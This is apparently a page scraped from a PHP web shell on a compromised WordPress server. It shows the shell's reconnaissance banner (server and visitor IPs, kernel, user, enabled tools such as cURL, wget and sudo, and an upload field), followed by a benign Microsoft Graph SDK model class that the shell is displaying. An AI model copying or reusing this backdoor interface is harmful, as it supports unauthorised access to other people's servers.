Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /proc/thread-self/cwd/vendor/microsoft/microsoft-graph/src/Model/ |
Upload File : |
<?php
/**
* Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
*
* ServicePlanInfo File
* PHP version 7
*
* @category Library
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;
/**
* ServicePlanInfo class
*
* @category Model
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
class ServicePlanInfo extends Entity
{
/**
* Gets the appliesTo
* The object the service plan can be assigned to. The possible values are:User - service plan can be assigned to individual users.Company - service plan can be assigned to the entire tenant.
*
* @return string|null The appliesTo
*/
public function getAppliesTo()
{
if (array_key_exists("appliesTo", $this->_propDict)) {
return $this->_propDict["appliesTo"];
} else {
return null;
}
}
/**
* Sets the appliesTo
* The object the service plan can be assigned to. The possible values are:User - service plan can be assigned to individual users.Company - service plan can be assigned to the entire tenant.
*
* @param string $val The value of the appliesTo
*
* @return ServicePlanInfo
*/
public function setAppliesTo($val)
{
$this->_propDict["appliesTo"] = $val;
return $this;
}
/**
* Gets the provisioningStatus
* The provisioning status of the service plan. The possible values are:Success - Service is fully provisioned.Disabled - Service has been disabled.ErrorStatus - The service plan has not been provisioned and is in an error state.PendingInput - Service is not yet provisioned; awaiting service confirmation.PendingActivation - Service is provisioned but requires explicit activation by administrator (for example, Intune_O365 service plan)PendingProvisioning - Microsoft has added a new service to the product SKU and it has not been activated in the tenant, yet.
*
* @return string|null The provisioningStatus
*/
public function getProvisioningStatus()
{
if (array_key_exists("provisioningStatus", $this->_propDict)) {
return $this->_propDict["provisioningStatus"];
} else {
return null;
}
}
/**
* Sets the provisioningStatus
* The provisioning status of the service plan. The possible values are:Success - Service is fully provisioned.Disabled - Service has been disabled.ErrorStatus - The service plan has not been provisioned and is in an error state.PendingInput - Service is not yet provisioned; awaiting service confirmation.PendingActivation - Service is provisioned but requires explicit activation by administrator (for example, Intune_O365 service plan)PendingProvisioning - Microsoft has added a new service to the product SKU and it has not been activated in the tenant, yet.
*
* @param string $val The value of the provisioningStatus
*
* @return ServicePlanInfo
*/
public function setProvisioningStatus($val)
{
$this->_propDict["provisioningStatus"] = $val;
return $this;
}
/**
* Gets the servicePlanId
* The unique identifier of the service plan.
*
* @return string|null The servicePlanId
*/
public function getServicePlanId()
{
if (array_key_exists("servicePlanId", $this->_propDict)) {
return $this->_propDict["servicePlanId"];
} else {
return null;
}
}
/**
* Sets the servicePlanId
* The unique identifier of the service plan.
*
* @param string $val The value of the servicePlanId
*
* @return ServicePlanInfo
*/
public function setServicePlanId($val)
{
$this->_propDict["servicePlanId"] = $val;
return $this;
}
/**
* Gets the servicePlanName
* The name of the service plan.
*
* @return string|null The servicePlanName
*/
public function getServicePlanName()
{
if (array_key_exists("servicePlanName", $this->_propDict)) {
return $this->_propDict["servicePlanName"];
} else {
return null;
}
}
/**
* Sets the servicePlanName
* The name of the service plan.
*
* @param string $val The value of the servicePlanName
*
* @return ServicePlanInfo
*/
public function setServicePlanName($val)
{
$this->_propDict["servicePlanName"] = $val;
return $this;
}
}